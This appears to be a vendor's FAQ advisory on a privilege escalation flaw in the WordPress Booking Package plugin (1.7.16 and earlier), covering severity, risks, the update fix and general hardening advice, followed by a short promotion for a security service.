Identifying vulnerable installations
Any WordPress site using the Booking Package plugin version 1.7.16 or earlier is vulnerable. Administrators should check their plugin version and update if necessary to ensure protection against this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Booking Package plugin installed. If it is version 1.7.16 or earlier, your site is at risk and should be updated immediately.
What is the recommended fix for this vulnerability?
Steps to mitigate the issue
The recommended fix is to update the Booking Package plugin to version 1.7.17 or later. This version includes critical security patches that address the privilege escalation flaw.
What does a CVSS score of 7.2 indicate?
Understanding severity levels
A CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk to the security of the affected system, warranting immediate attention and remediation.
What practical risks does this vulnerability pose?
Consequences of exploitation
If exploited, this vulnerability allows attackers to gain full control of a WordPress site. They can change user credentials, install malicious plugins, and modify site content, leading to a complete compromise of the site.
What does the proof of concept demonstrate?
Understanding exploitation
The proof of concept illustrates how an authenticated attacker can exploit the vulnerability by sending a specially crafted POST request to the vulnerable AJAX endpoint. It shows the steps required to log in as an attacker and modify the target user’s credentials.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for security
To protect your WordPress site, regularly update all plugins and themes, use strong passwords, implement user role restrictions, and conduct security audits. Additionally, consider using security plugins that monitor for vulnerabilities.
What should I do if I suspect my site has been compromised?
Immediate actions to take
If you suspect your site has been compromised, immediately change all passwords, check user accounts for unauthorized changes, and restore from a clean backup if necessary. Additionally, conduct a thorough security audit to identify and remediate any vulnerabilities.
Are there any additional resources for understanding this vulnerability?
Further reading and tools
For more information, consult the official CVE database, security blogs, and WordPress security forums. Additionally, consider using vulnerability scanning tools to identify potential risks in your WordPress installation.
How can I report vulnerabilities I discover?
Responsible disclosure process
If you discover a vulnerability, report it responsibly to the plugin developer or maintainers. Many organizations have a process for handling security disclosures, and responsible reporting helps improve overall security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations